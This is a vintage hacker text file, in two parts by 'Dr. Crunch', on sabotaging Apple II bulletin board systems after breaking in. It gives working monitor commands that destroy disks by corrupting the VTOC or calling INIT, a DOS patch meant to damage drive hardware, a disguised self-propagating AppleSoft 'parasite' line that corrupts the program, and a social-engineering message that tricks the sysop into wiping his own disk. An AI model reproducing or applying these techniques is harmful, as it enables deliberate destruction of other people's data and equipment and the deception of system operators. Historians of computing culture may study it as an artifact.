WHAT TO DO WHEN YOU BREAK INTO A BBS ==================================== BY -=> DOCTOR CRUNCH <=- OK, YOU PROBABLY HAVE READ T-FILES ABOUT HOW TO BREAK IN A BBS. SO, I WILL TELL YOU WHAT TO DO WHEN YOU GET INTO THE BBS. MOST SYSOPS, IF THEY HAVE AN IQ, WILL DISABLE THE INIT COMMAND. THEY USUALLY DO THIS BY CHANGING THE INIT COMMAND TO SOME OTHER WORD YOU WILL NEVER GUESS. WELL, THERE IS AN EASIER WAY TO CRASH THE BBS THAN BY SEARCHING FOR WHAT THE SYSOP CHANGED IT TO. GET IN THE MONITER (CALL-151), AND TYPE: A54FG THIS IS THE INIT COMMAND'S ENTRY POINT WHICH DOS CALLS TO INITIALIZE A DISK. THERE ARE SOME BUGS WITH THIS WAY OF CRASHING A DISK THOUGH: 1) IT TAKES ABOUT 40 SECONDS TO INIT A DISK, AND 9F A SYSOP IS THERE, HE CAN STOP YOU AT ANY TIME. 2) MANY BOARDS USE A FAST DOS; AND, MOST FAST-DOSES HAD TO TAKE OUT THE INIT COMMAND TO MAKE THE MODS TO DOS. SO, EVEN IF YOU DO A A54FG, YOU WON'T BE ABLE TO KILL THE DISK. I PREFER TO KILL THE VTOC, INSTEAD OF INITING THE DISK. HERE ARE A COUPLE OF REASONS WHY: 1) VERY QUICK!!!!! 2) VERY NASTY!!!!! THE TRICK IS TO REWRITE THE VTOC (VOLUME TABLE OF CONTENTS) TO SAY THAT THE CATALOG TRACK IS 255. NOW ALL OF US KNOW THERE IS NO TRACK 255 ON A DISK, THIS CAN ONLY MEAN.....(YOU GUESSED IT) THAT THE SYSTEM WILL BOMB WHEN DOING ANYTHING THAT INVOLVES LOOKING AT THE CATALOG TRACK. SINCE ALMOST EVERYTHING YOU CAN DO IN DOS INVOLVES READING THE CATALOG TRACK, THIS WILL CRASH THE BBS QUITE WELL. AND HERE IS A NICE LITTLE CATCH, YOU CAN REBOOT HIS DISK (WHICH WILL GIVE HIM AN I/O ERROR BECAUSE WHEN THE HELLO FILE IS RUN, DOS MUST LOOK AT THE CATALOG TRACK) AND LOGOFF AT THE SAME TIME. YOU SHOULD ALWAYS LOGOFF QUICKLY SO THAT THE SYSOP CAN'T LIFT UP THE PHONE, WHICH SOMETIMES WILL PREVENT YOU FROM HANGING UP. THE WAY I LOGOFF IS THE MAKE THE BBS I JUST CRASHED DO A RESET, CAUSING ME TO BE DISCONNECTED FROM THE OTHER END OF THE LINE. SINCE MOST TERMINAL PROGRAMS HANG UP IF YOU LOOSE THE CARRIER (WHICH WILL HAPPEN WHEN HIS SYSTEM RESETS), YOU WILL HANG UP THE SECOND YOU CRASH HIS SYSTEM!!!! WELL, HERE IT IS: (BE SURE YOU'RE IN THE MONITER) *B3BC:FF NAFFBG 3F4:00 NFA62G IF YOU DON'T WANT TO LOGOFF, *B3BC:FF NAFFBG NOTE: SOMETIMES YOU MAY HEAR A BEEP, THEN ALL OF YOUR MONITER COMMANDS WILL FAIL. THIS IS BECAUSE OF A BUG IN DOS. WHEN RWTS LETS GO OF CONTROL, THE MONITER VARIBLE $48 IS DESTROYED. TO WORK PROPERLY, $48 MUST BE RESTORED TO 0 BEFORE THE MONITER TAKES CONTROL AGAIN. I MADE A SHORT ROUTINE THAT WHEN CALLED, WRITES THE VTOC BUFFER TO THE DISK, AND SETS $48 TO 0. THE ROUTINE IS: 300- 20 FB AF JSR $AFFB 302- A9 00 LDA #$00 304- 85 48 STA $48 306- 60 RTS SOMETIMES IT IS DESIRABLE TO CRASH THE DISKS IN DRIVE 1 AND DRIVE 2. THIS CAN BE DONE IN 1 LINE, INCLUDING THE QUICK LOGOFF: *300:20 FB AF A9 00 85 48 60 N B3BC:FF NB5F8:1 (DRV1) N300G B5F8:2 N300G 3F4:FF N FA62G WELL, THAT'S ALL FOLKS!!! HAVE LOTS OF FUN...... ============== 3>DR. CRUNCH<+ ============== -=*> P.S. I WAS MESSING AROUND WITH DOS A COUPLE OF DAYS AGO AND I FIGURED OUT A REAL, REAL, REAL, NASTY ONE. YOU HAVE PROBABLY HEARD OF LETTING THE DRIVE SPIN FOR A COUPLE OF DAYS TO RUIN IT. THIS WORX, BUT IT TAKES A LONG TIME... I LIKE THIS 1 BETTER: *BDCC:EA EA NBDDA:EA EA THIS MODS DOS TO RECALIBRATE THE DRIVE HEAD FOREVER (UNLESS THE SYSOP WALKS IN). SO, ALL YOU DO NOW IS USE A DOS COMMAND THAT READS THE DISK, AND THE DRIVE IS GOING TO MAKE ALOT OF FUNNY SOUNDS! CATALOG IS THE BEST ONE TO USE, SINCE IT IS IN ALMOST EVERY DOS UNMODIFIED. ===== NOTE: THIS SHOULD ONLY BE DONE WHEN ===== THERE IS A VERY, VERY, GOOD REASON TO WASTE SOME DUDES DRIVE. DON'T EVER DO THIS AS A PRANK, BECAUSE IT WORKS! ZATZ IT.. )>DR. CRUCH<( <> ^^^^^^^^ ^^ ^^ ^^^ /\_________________________________________________________________________/\ \/ \/ BBS CRASHING: MORE NIFTY TRIX ***************************** * BY DR. CRUNCH * *>-------------------------<* *) TYPED AND UPLOADED FOR: (* *) THE ASSASSIN'S KNOT (* *>-------------------------<* *STONEHENGE(814)237-5635 * ***************************** BBS CRASHING: MORE NIFTY TRIX WELL, I HAD SUCH A FUN TYME PUTTING NIFTY STUFF IN MY LAST T-FILE, I DECIDED TO DO IT AGAIN. IN THIS FILE I WILL DISCUSS THE TYME BOMB, THE SNEAKY SPUD, AND THE BUGGER. THEY ALL ARE GREAT FOR REVENGE, GETTING EVEN, AND JUST BEING A PAIN IN THE A$$. WELL, I WON'T KEEP YOU SUSPENDED ANYMORE, HERE THEY ARE! TYME BOMB ========= THIS CRASH TAKES A LONG TIME TO WORK, BUT THERE IS ALMOST NO WAY TO DETECT IT. IT INVOLVES ADDING A LINE IN A COMMON USED PLACE, BUT NOT TOO COMMON. THAT MEANS, THE G-FILE SECTION OF A BBS IS A GOOD PLACE, BUT THE MAIN MENU IS NOT. ONCE YOU HAVE DECIDED WHERE TO PUT IT, FIND TWO FAT LINES IN THAT AREA. THESE LINES WILL BE THE DISGUISE LINES. YOU WILL PLACE A LINE BETWEEN THEM, AND THEY WILL CAMOUFLAGE IT (HOPEFULLY). NOW INSERT THIS LINE RIGHT AFTER THE FIRST DISGUISE LINE, AND BEFORE THE SECOND. LIKE THIS: 10130 XXXXXXXX DISGUISE LINE XXXXXX 10134 POKE INT(RND(1)*30000)+2053,0 10140 XXXXXXXX DISGUISE LINE XXXXXX THIS WILL, EVERY TIME IT HITS LINE 10134, POKE A RANDOM BYTE IN THE PROGRAM TO 0. ALL OF YOU APPLESOFT HACKERS OUT THERE SHOULD REMEMBER THAT APPLESOFT USES THE BYTE 0 TO SIGNAL THE END OF A LINE; MEANING: THE ENDS OF SOME LINES WILL START TO DISAPEAR. I PARTICULARLY LIKE THIS LITTLE TRICK BECUZ WHEN BUGS DO APPEAR IN THE PROG- RAM, THEY ARE ALMOST NEVER NEAR THE LINE WE INSERTED. THE BUGS APPEAR SO SLOWLY THAT, BY THE TIME THEY ARE DISCOVERED, A BACKUP OF THE BBS PROGRAM CONTAINING OUR LITTLE LINE HAS USUALLY BEEN MADE. SO, WHEN THE SYSOP BEGINS TO USE HIS BACKUP COPY, OUR LITTLE BUG WILL AGAIN BEGIN TO GNAW AWAY AT THE HOST PROGRAM. NOW LETS GET SOME TERMS DOWN. A CRASH THAT IS INSERTED IN THE BBS AND SLOWLY DESTROYS IT IS CALLED A PARASITE. THE PROGRAM THE PARASITE IS KILLING IS CALLED THE HOST PROGRAM. (SOUNDS LIKE BIOLOGY, EH?) STEP BY STEP: 1) GET INTO THE BBS SOMEHOW 2) FIND A COMMONLY USED PLACE, BUT NOT TOO COMMON. 3) INSERT THE PARASITE LINE BETWEEN TWO DISGUISE LINES. 4)>BE SURE TO SAVE THE HOST PROGRAM AFTER THE PARASITE HAS BEEN PUT IN IT! IF YOU DON'T, WHEN THE HOST PROGRAM'S COMPUTER IS TURNED OFF, THE PARASITE WILL BE LOST. ====================================== SNEAKY SPUD WHO WOULD A SYSOP LEAST EXPECT TO CRASH HIS BOARD? HIMSELF! THIS LITTLE CRASH INVOLVES MODIFYING DOS SO THAT WHEN THE DRIVE IS CATALOGED THE DISK IS INITIALIZED INSTEAD. NOW YOU COULD, YOURSELF, INITIALIZE THE DISK, BUT IT IS MUCH MORE FUN TO LET THE SYSOP DO IT FOR HIMSELF. WHY? 1) HE CAN'T FIND OUT WHO DID IT. 2) IF HE CRASHES HIS OWN BBS, HE WILL MAKE HIMSELF A COMPLETE ASS, AND YOU TORMENT HIM WITH THAT INFORMATION UNTIL HE CRIES! LETS SEE HOW THIS DONE. 1) GET INTO THE MONITER. 2) TYPE "A56E:4C 4F A5" 3) EXIT TO BASIC (3D0G) 4) RERUN THE PROGRAM SO IT WILL LOG YOU OFF. 5) CALL THE BOARD BACK AND LOGON NEW UNDER SOME NAME LIKE: THE TIDY BOWL MAN OR FAT ALBERT OR UTAH JACK OR (WHO GIVES A DAMN?). 6) SEND HIM SOME FEEDBACK THAT WILL MAKE HIM CATALOG THE DISK. SUCH AS: EVERYTIME I TRY TO POST OR SEND MAIL TO A USER I GET THIS MESSAGE THEN I GET LOGGED OFF! I'M NOT SURE, BUT I THINK THAT YOUR DRIVE IS FULL. TO BE ON THE SAFE SIDE, TAKE A CATALOG OF THEM AND SEE IF THERE ARE MORE THAN 122 FILES. EVEN THOUGH YOU MAY HAVE FREE SECTOS, YOU MAY NOT HAVE ENOUGH ROOM IN THE CATALOG FOR MORE FILE NAMES. I HOPE YOU GET IT FIXED SOON! LAT0R0N MAN, S P U D P E A L E R ======= =========== 7) LOGOFF. NOW WHEN HE SEES YOUR MESSAGE AND TAKES A CATALOG HE WILL GET HIS DISK FRIED. HE WILL PROBABLY BE ABLE TO HIT RESET BEFORE THE DISK IS INITED COMPLETELY, BUT ENOUGH WILL BE ERASED TO SCREW HIM UP. ====================================== THE BUGGER THIS ONE IS EASY. LOG ONTO A BOARD THAT IS EASY TO BREAK INTO AND DELETE SOME LINES OF YOUR CHOICE. THEN SAVE IT. DO THIS EVERY DAY OR SO FOR A MONTH. AT THE END OF THE MONTH THE SYSOP WILL BE IN THE RUBBER ROOM SINGING JINGLE BELLS WHILE PLAYING A GAME OF HOPSCOTCH. ====================================== WELL, THAT WRAPS UP ANOTHER EXCITING EPISODE OF "CRASHING CHRONICLES". ZATZ ALL! )>DR. CRUNCH<( THE ELIMINATOR <<*UPLOADED BY DE BUG*>> ^^^^^^^^ ^^ ^^ ^^^ Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open